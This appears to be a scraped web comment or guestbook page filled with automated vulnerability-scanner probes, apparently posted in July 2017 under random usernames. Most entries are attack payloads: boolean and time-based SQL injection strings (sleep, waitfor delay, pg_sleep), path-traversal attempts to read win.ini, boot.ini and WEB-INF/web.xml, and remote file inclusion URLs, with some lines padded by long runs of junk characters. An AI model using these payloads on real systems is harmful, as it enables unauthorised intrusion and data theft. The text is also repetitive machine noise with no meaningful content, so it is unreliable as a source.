http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

ccjsvcpk
7/6/2017 6:20:14 AM

1some_inexistent_file_with_long_name.jpg

ccjsvcpk
7/6/2017 6:20:21 AM

Http://testasp.vulnweb.com/t/fit.txt

ccjsvcpk
7/6/2017 6:20:29 AM

http://testasp.vulnweb.com/t/fit.txt?.jpg

ccjsvcpk
7/6/2017 6:20:41 AM

testasp.vulnweb.com

ccjsvcpk
7/6/2017 6:23:06 AM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

ccjsvcpk
7/6/2017 6:23:13 AM

1some_inexistent_file_with_long_name.jpg

fwrmxvla
7/6/2017 6:23:27 AM

../../../../../../../../../../windows/win.ini

ccjsvcpk
7/6/2017 6:23:30 AM

Http://testasp.vulnweb.com/t/fit.txt

fwrmxvla
7/6/2017 6:23:36 AM

../../../../../../../../../../boot.ini

sknkcrdc
7/6/2017 6:23:43 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 6:23:46 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

fwrmxvla
7/6/2017 6:23:49 AM

../../../../../../../../../../windows/win.ini.jpg

ccjsvcpk
7/6/2017 6:23:50 AM

http://testasp.vulnweb.com/t/fit.txt?.jpg

sknkcrdc
7/6/2017 6:23:53 AM

-1 OR 2+729-729-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:23:55 AM

-1 OR 3+729-729-1=0+0+0+1 --

ccjsvcpk
7/6/2017 6:23:57 AM

testasp.vulnweb.com

fwrmxvla
7/6/2017 6:23:59 AM

������������������������������������������������windows��win.ini

sknkcrdc
7/6/2017 6:24:07 AM

-1 OR 3*2<(0+5+729-729) --

sknkcrdc
7/6/2017 6:24:10 AM

-1 OR 3*2>(0+5+729-729) --

sknkcrdc
7/6/2017 6:24:18 AM

-1 OR 2+579-579-1=0+0+0+1

fwrmxvla
7/6/2017 6:24:23 AM

................windowswin.ini

sknkcrdc
7/6/2017 6:24:25 AM

-1 OR 3+579-579-1=0+0+0+1

fwrmxvla
7/6/2017 6:24:28 AM

..\..\..\..\..\..\..\..\windows\win.ini

sknkcrdc
7/6/2017 6:24:32 AM

-1 OR 3*2<(0+5+579-579)

sknkcrdc
7/6/2017 6:24:36 AM

-1 OR 3*2>(0+5+579-579)

fwrmxvla
7/6/2017 6:24:37 AM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

sknkcrdc
7/6/2017 6:24:43 AM

-1' OR 2+740-740-1=0+0+0+1 --

fwrmxvla
7/6/2017 6:24:47 AM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

sknkcrdc
7/6/2017 6:24:51 AM

-1' OR 3+740-740-1=0+0+0+1 --

fwrmxvla
7/6/2017 6:24:54 AM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

sknkcrdc
7/6/2017 6:24:56 AM

-1' OR 3*2<(0+5+740-740) --

fwrmxvla
7/6/2017 6:24:59 AM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

sknkcrdc
7/6/2017 6:25:03 AM

-1' OR 3*2>(0+5+740-740) --

fwrmxvla
7/6/2017 6:25:13 AM

WEB-INF/web.xml

sknkcrdc
7/6/2017 6:25:25 AM

-1' OR 2+300-300-1=0+0+0+1 or 'absgTRBn'='

sknkcrdc
7/6/2017 6:25:32 AM

-1' OR 3+300-300-1=0+0+0+1 or 'absgTRBn'='

fwrmxvla
7/6/2017 6:25:36 AM

WEB-INF\web.xml

ccjsvcpk
7/6/2017 6:25:56 AM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

ccjsvcpk
7/6/2017 6:25:58 AM

1some_inexistent_file_with_long_name.jpg

ccjsvcpk
7/6/2017 6:26:00 AM

Http://testasp.vulnweb.com/t/fit.txt

ccjsvcpk
7/6/2017 6:26:07 AM

http://testasp.vulnweb.com/t/fit.txt?.jpg

sknkcrdc
7/6/2017 6:26:08 AM

-1' OR 3*2<(0+5+300-300) or 'absgTRBn'='

ccjsvcpk
7/6/2017 6:26:10 AM

testasp.vulnweb.com

sknkcrdc
7/6/2017 6:26:11 AM

-1' OR 3*2<(0+5+300-300) or 'absgTRBn'='

sknkcrdc
7/6/2017 6:26:19 AM

-1' OR 3*2>(0+5+300-300) or 'absgTRBn'='

sknkcrdc
7/6/2017 6:26:24 AM

-1" OR 2+741-741-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:26:27 AM

-1" OR 3+741-741-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:26:39 AM

-1" OR 3*2<(0+5+741-741) --

sknkcrdc
7/6/2017 6:27:07 AM

-1" OR 3*2>(0+5+741-741) --

sknkcrdc
7/6/2017 6:27:17 AM

if(now()=sysdate(),sleep(93),0)/*'XOR(if(now()=sysdate(),sleep(93),0))OR'"XOR(if(now()=sysdate(),sleep(93),0))OR"*/

sknkcrdc
7/6/2017 6:27:22 AM

(select(0)from(select(sleep(93)))v)/*'+(select(0)from(select(sleep(93)))v)+'"+(select(0)from(select(sleep(93)))v)+"*/

sknkcrdc
7/6/2017 6:27:24 AM

1 waitfor delay '0:0:31' --

sknkcrdc
7/6/2017 6:27:48 AM

qZ4FH765'; waitfor delay '0:0:31' --

sknkcrdc
7/6/2017 6:27:51 AM

CUGrUxQE'); waitfor delay '0:0:31' --

ccjsvcpk
7/6/2017 6:28:05 AM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

sknkcrdc
7/6/2017 6:28:09 AM

TTjdiLWf')); waitfor delay '0:0:31' --

sknkcrdc
7/6/2017 6:28:12 AM

ZUggCSVn';select pg_sleep(31); --

ccjsvcpk
7/6/2017 6:28:15 AM

1some_inexistent_file_with_long_name.jpg

sknkcrdc
7/6/2017 6:28:21 AM

Aymv0V9X');select pg_sleep(31); --

ccjsvcpk
7/6/2017 6:28:22 AM

Http://testasp.vulnweb.com/t/fit.txt

ccjsvcpk
7/6/2017 6:28:27 AM

http://testasp.vulnweb.com/t/fit.txt?.jpg

sknkcrdc
7/6/2017 6:28:29 AM

pj9rjQBM'));select pg_sleep(62); --

ccjsvcpk
7/6/2017 6:28:35 AM

testasp.vulnweb.com

fwrmxvla
7/6/2017 6:29:43 AM

../../../../../../../../../../windows/win.ini

fwrmxvla
7/6/2017 6:29:52 AM

../../../../../../../../../../boot.ini

fwrmxvla
7/6/2017 6:29:58 AM

../../../../../../../../../../windows/win.ini.jpg

fwrmxvla
7/6/2017 6:30:03 AM

������������������������������������������������windows��win.ini

fwrmxvla
7/6/2017 6:30:13 AM

................windowswin.ini

fwrmxvla
7/6/2017 6:30:27 AM

..\..\..\..\..\..\..\..\windows\win.ini

fwrmxvla
7/6/2017 6:30:31 AM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

fwrmxvla
7/6/2017 6:30:35 AM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

fwrmxvla
7/6/2017 6:30:40 AM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

fwrmxvla
7/6/2017 6:30:44 AM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

fwrmxvla
7/6/2017 6:30:50 AM

WEB-INF/web.xml

fwrmxvla
7/6/2017 6:30:54 AM

WEB-INF\web.xml

ccjsvcpk
7/6/2017 6:31:25 AM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

ccjsvcpk
7/6/2017 6:31:29 AM

1some_inexistent_file_with_long_name.jpg

ccjsvcpk
7/6/2017 6:31:41 AM

Http://testasp.vulnweb.com/t/fit.txt

ccjsvcpk
7/6/2017 6:31:46 AM

http://testasp.vulnweb.com/t/fit.txt?.jpg

ccjsvcpk
7/6/2017 6:32:10 AM

testasp.vulnweb.com

ccjsvcpk
7/6/2017 6:34:48 AM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

ccjsvcpk
7/6/2017 6:35:07 AM

1some_inexistent_file_with_long_name.jpg

ccjsvcpk
7/6/2017 6:35:16 AM

Http://testasp.vulnweb.com/t/fit.txt

ccjsvcpk
7/6/2017 6:35:31 AM

http://testasp.vulnweb.com/t/fit.txt?.jpg

ccjsvcpk
7/6/2017 6:35:54 AM

testasp.vulnweb.com

sknkcrdc
7/6/2017 6:37:01 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 6:37:04 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

fwrmxvla
7/6/2017 6:37:09 AM

../../../../../../../../../../windows/win.ini

sknkcrdc
7/6/2017 6:37:10 AM

-1 OR 2+919-919-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:37:19 AM

-1 OR 3+919-919-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:37:31 AM

-1 OR 3*2<(0+5+919-919) --

sknkcrdc
7/6/2017 6:37:35 AM

-1 OR 3*2>(0+5+919-919) --

fwrmxvla
7/6/2017 6:37:37 AM

../../../../../../../../../../boot.ini

sknkcrdc
7/6/2017 6:37:40 AM

-1 OR 2+353-353-1=0+0+0+1

fwrmxvla
7/6/2017 6:37:41 AM

../../../../../../../../../../windows/win.ini.jpg

sknkcrdc
7/6/2017 6:37:43 AM

-1 OR 3+353-353-1=0+0+0+1

sknkcrdc
7/6/2017 6:37:50 AM

-1 OR 3*2<(0+5+353-353)

fwrmxvla
7/6/2017 6:37:58 AM

������������������������������������������������windows��win.ini

sknkcrdc
7/6/2017 6:38:04 AM

-1 OR 3*2>(0+5+353-353)

sknkcrdc
7/6/2017 6:38:09 AM

-1' OR 2+262-262-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:38:16 AM

-1' OR 3+262-262-1=0+0+0+1 --

fwrmxvla
7/6/2017 6:38:18 AM

................windowswin.ini

sknkcrdc
7/6/2017 6:38:20 AM

-1' OR 3*2<(0+5+262-262) --

sknkcrdc
7/6/2017 6:38:24 AM

-1' OR 3*2>(0+5+262-262) --

sknkcrdc
7/6/2017 6:38:29 AM

-1' OR 2+241-241-1=0+0+0+1 or 'KJyhvidS'='

fwrmxvla
7/6/2017 6:38:32 AM

..\..\..\..\..\..\..\..\windows\win.ini

sknkcrdc
7/6/2017 6:38:36 AM

-1' OR 3+241-241-1=0+0+0+1 or 'KJyhvidS'='

sknkcrdc
7/6/2017 6:38:39 AM

-1' OR 3*2<(0+5+241-241) or 'KJyhvidS'='

sknkcrdc
7/6/2017 6:38:43 AM

-1' OR 3*2>(0+5+241-241) or 'KJyhvidS'='

fwrmxvla
7/6/2017 6:38:48 AM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

sknkcrdc
7/6/2017 6:38:51 AM

-1" OR 2+449-449-1=0+0+0+1 --

fwrmxvla
7/6/2017 6:38:53 AM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

ccjsvcpk
7/6/2017 6:38:56 AM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

fwrmxvla
7/6/2017 6:38:58 AM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

ccjsvcpk
7/6/2017 6:39:05 AM

1some_inexistent_file_with_long_name.jpg

sknkcrdc
7/6/2017 6:39:08 AM

-1" OR 3+449-449-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:39:12 AM

-1" OR 3*2<(0+5+449-449) --

fwrmxvla
7/6/2017 6:39:14 AM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.